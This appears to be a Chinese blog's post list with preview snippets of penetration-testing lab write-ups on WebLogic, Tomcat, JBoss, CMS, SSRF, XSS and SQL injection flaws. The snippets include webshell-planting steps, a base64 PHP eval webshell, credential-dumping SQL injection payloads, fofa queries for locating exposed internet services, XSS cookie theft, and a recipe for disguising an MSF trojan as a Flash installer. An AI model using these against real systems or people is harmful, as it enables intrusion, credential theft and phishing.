- 博客(40)
- 收藏
- 关注
原创 常见框架漏洞(合集)
直接拼接将url中的system替换为phpinfo,whoami替换为-1,则会显示出phpinfo();的执行结果,这说明这个页面也存在远程代码执行漏洞/index.php?尝试获取shell,利用他的远程命令执行漏洞,输出一个一句话木马到1.php文件中,构造url如下,其中$_POST前加反斜杠是因为该网站会对其进行转义,\可以防止被转义/index.php??直接在IP后面加上/1.php访问,成功后用蚁剑连接。
2024-08-09 15:17:17
745
原创 Jboss 漏洞合集
1.打开环境访问漏洞地址 /jbossmq-httpil/HTTPServerILServlet。1.搭建好环境打开,点击jmx console 登录,默认密码为admin/vulhub。2.访问地址/invoker/JMXInvokerServlet自动下载如下文件。1.搭建环境并在url跟/invoker/readonly查看是否有漏洞。4.在右边的输入框内输入下载的war地址然后点击invoke。6.访问上传的war内的jsp没有报错证明访问成功。7.使用哥斯拉进行连接测试,测试成功。
2024-08-06 19:06:58
338
原创 WebLogic 相关漏洞复现合集
1.搭建环境,启动在url后加/_async/AsyncResponseService,显示以下页面,则说明存在漏洞。1.打开Java反序列化漏洞利用工具软件,将要测试的网址复制进去,点击检查。5.上传war包,jsp木马压缩成zip,修改后缀为war,上传。3.点击文件上传--将自己的jsp木马输入进去 点击上传。7.上传完成后访问你植入的木马,没有报错证明注入成功。4.访问木马路径,访问成功证明植入成功。5.访问此地址,访问成功证明注入成功。3.访问植入的木马,成功代表植入成功。
2024-08-06 16:57:36
277
原创 CVE-2020-1938 漏洞复现
1.搭建环境并且打开点击任何地方都不能输入2.打开kali下载cve2020-19383.右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip
2024-08-06 16:50:55
287
原创 CVE-2017-12615 漏洞复现
1.搭建环境进行抓包,将POST改为PUT并且在后面加上文件名 并在下方写上木马。2.放行后访问此文件夹,访问成功证明注入成功。
2024-08-06 16:49:33
240
原创 后台弱口令部署war包 漏洞复现
1.搭建好环境打开页面---点击右方的manager app 默认账号密码为tomcat。3.将你生成的jsp木马压缩为zip格式并将后缀名改为war。5.点击完后在后面加lkj.jsp,访问成功证明注入成功。4.提交此war压缩包然后在目录中点击。2.登录完成后滑到下面点击浏览。
2024-08-06 16:48:02
255
原创 tomato/A1web 1.0/hackme/靶机复现漏洞详解
首先虚拟机建一个hackme靶机切换nat模式 然后kali扫描自己全端口nmap -sV ip段 0/24扫描出ip进行访问发现是个登录页面可以注册先注册然后登录发现是搜索框,我们直接用搜索型的sql注入。
2024-08-05 20:05:18
873
原创 【文件解析漏洞】实战详解!
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。影响版本:2.4.0~2.4.29利用姿势:步骤一:进入Vulhub靶场并开启目标靶机,进行访问.
2024-08-05 19:50:57
828
原创 未授权访问漏洞系列详解
1.在fofa中搜索 (port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"1.使用fofa搜索 (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)1.使用fofa搜索(port="5900") && (is_honeypot=false && is_fraud=false)2.使用kali执行未授权访问测试命令 curl ip:port。
2024-08-05 19:07:43
679
原创 未授权访问漏洞系列详解
这两个端口都是提供 Api Server 服务的,一个可以直接通过Web 访问,另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限,那么攻击者就可以通过这两个接口去获取容器的权限。3.设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP地址才能访问包括 50070 以及 WebUl 等相关端口。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin ,在打开的页面输入.
2024-08-05 18:43:57
403
原创 未授权访问漏洞系列详解
在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。1.禁用/env接口。
2024-08-05 18:40:58
354
原创 未授权访问漏洞系列详解
而我们这章的主题Kibana担任视图层角色,拥有各种维度的查询和分析并使用图形化的界面展示存放在Elasticsearch中的数据。2.使用TLS认证修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,Docker CLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
2024-08-05 18:37:53
2723
原创 未授权访问漏洞系列详解
1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"1.因为mongoDB的默认端口为27017,我们直接在fofa上搜索 port="27017"(搜索端口号为27017的网站)1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页(6379为默认的redis端口号)
2024-08-04 22:54:14
706
原创 Pageadmin-漏洞复现(上传⽂件漏洞)
8.使用中国蚁剑将asp路径以及密码输入进去,测试连接,连接成功证明文件上传漏洞成功。5.点击功能菜单----上传文件 上传我们刚刚压缩好的zip文件。7.在地址栏中访问解压出来的asp文件,未报错证明木马注入成功。1.搭建环境启动登录管理员账户,在网址后加/admin。管理---生成 生成一个密码为pass的asp木马。6.上传后点击zip后的解压,将压缩包内的文件解压出来。4.将asp木马压缩成zip格式以便一会上传。2.进入后点击工具---
2024-08-04 22:47:29
423
原创 WordPress--漏洞复现
4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。3.将文件内容改为我们的。
2024-08-04 22:44:44
700
原创 DeDeCMS-漏洞复现
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。1.点击模板--广告管理--生成一个新广告。3.点击右方的编辑进入后改成写入的。5.给出一个更新后的路径。
2024-08-04 22:42:40
519
原创 PhPMyadmin-漏洞复现
2.因为extensions同级目录下有www文件存放网站,所以我们猜测网站路径在D:\phpstudy_pro\WWW,使用into outfile将一句话木马写入别的目录下。4.在输入 set global general_log_file = '你要将日志保存的路径' 将日志文件路径设置好,点击执行。5.我们在sql框内输入select 123123 后执行,在刚刚的路径内找到我们的日志文件,可以找到我们刚才输入的指令。4.使用中国蚁剑将网址和木马内的密码输入,测试连接,成功即代表注入成功。
2024-08-03 17:29:20
366
原创 支付漏洞-niushop靶场
1.搭建好环境进入配置密码2.先注册一个用户3.选择一个喜欢的商品4.进入后开启抓包点击购买并进行抓包5.将购买数量改成-46.放行后提交订单发现实现了零元购
2024-08-03 17:19:58
159
原创 支付漏洞-cmseasy靶场
4.将数量改为1后点击购买跳转到输入地址界面,发现可以更改商品数量,改为-1后仅提示请输入联系电话,证明数量没有被检测到。8.点击确定后,查看个人中心,原本为0的余额变成了999证明支付漏洞成功。3.进入后,我们先试着将商品数量改为-1,提示最低购买一个。1.搭建靶场,启动环境进入,注册并登录用户。6.跳转页面后选择余额支付后点击购买。将其余信息填写完毕,点击在线支付。5.点击填写练习方式后。2.点击任意一款商品。7.提示我们购买成功。
2024-08-03 16:46:40
289
原创 php反序列化靶机serial实战
然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马。3.选择使用现有磁盘,选择下载的vmdk磁盘文件即可。然后backup目录下有一个bak.zip下载下来。下载好之后,使用Vmware新建一个虚拟机打开。查看文件,多来几次返回上级目录,找到txt文件。打开靶机,在kali虚拟机进行主机存活探测。然后抓包 访问得到的编码 替换cookie。发现有一个可以访问的目录,悄悄访问一下。
2024-08-01 20:38:51
352
原创 FastCGI协议
然后运行/var/www/html/index.php 在给他输入一个木马echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php就会得出编码。然后点开这个菜刀.exe右击添加把木马地址复制上后面小框写成cmd。这个需要用到kali里的一个工具gopherus-master。然后复制这个编码到url编码器进行编码。然后用python去运行这个。然后访问一下设置的php文件。然后复制地址打开工具中国菜刀。欲知后事如何且看下回分解。
2024-07-25 01:54:28
189
原创 POST请求
然后删东西只留下Host Content-Leng Content-Typ 然后修改host为127.0.0.1:80。然后把编码好的复制新建一个文档放进去把%0A全部替换为%0D%0A替换结束在最后手动加一个%0D%0A。依旧像平时一样访问http://127.0.0.1/flag.php会得到一个框。然后就可以用二次编码之后的吗拿去进行gopher访问l。然后复制这个请求包找url编码工具进行编码。然后查看页面源代码会得到一个key=然后复制key=后面的东西粘贴到框里。然后用抓包工具抓一下。
2024-07-24 23:34:57
342
原创 ssrf-端口扫描
然后点击payload设置payload类型为numbes然后把from设置为8000to设置为9000step设置为1然后开始攻击。等他反应结束点击长度找出最长的那个然后点击响应再点击页面渲染就可以得到了。然后把端口的8000选中。
2024-07-24 23:02:50
284
原创 DNS重绑定 Bypass
https://lock.cmpxch8b.com/rebinder.html访问这个网址。把B改成可以访问到的网址127.0.0.2就可以得出他们的十六进制。然后复制他们的十六进制返回题内访问/flag.php就可以访问到啦。
2024-07-24 22:34:30
167
原创 URL Bypass
challenge-1172c0eec82041ea.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
2024-07-24 22:10:06
148
原创 XSS-Flash攻击钓⻥
步骤三:来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤六:将两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为。步骤五:进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个⽊⻢...步骤四:修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!
2024-07-23 18:10:30
161
原创 XSS-窃取Cookie
打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去。步骤⼀:在以下⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称...⽴即提交。:模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。:此时回到平台上可看到其劫持的Cookie信息.点击查看 可以查看到其中的cookie字段。步骤⼆:在我的项⽬中选择我们刚创建的项⽬。步骤三:点击右上⻆的查看配置代码。复制script这⼀条代码。
2024-07-23 18:06:58
246
原创 SQL手工注入漏洞测试(MySQL数据库)
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member'--+查出表里的内容。union select 1,group_concat(name,password),3,4 from StormGroup_member--+查出用户名和密码。
2024-07-23 04:03:55
332
原创 SQL手工注入漏洞测试(Db2数据库)
id=1 -D DB2INST1 -T GAME_CHARACTER -C password --dump查出表中数据。id=1 --current-db查出当前的数据库。使用md5解密工具解除密码。利用sqlmap查出库名。然后登录就可以进去了。
2024-07-23 03:34:02
270
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人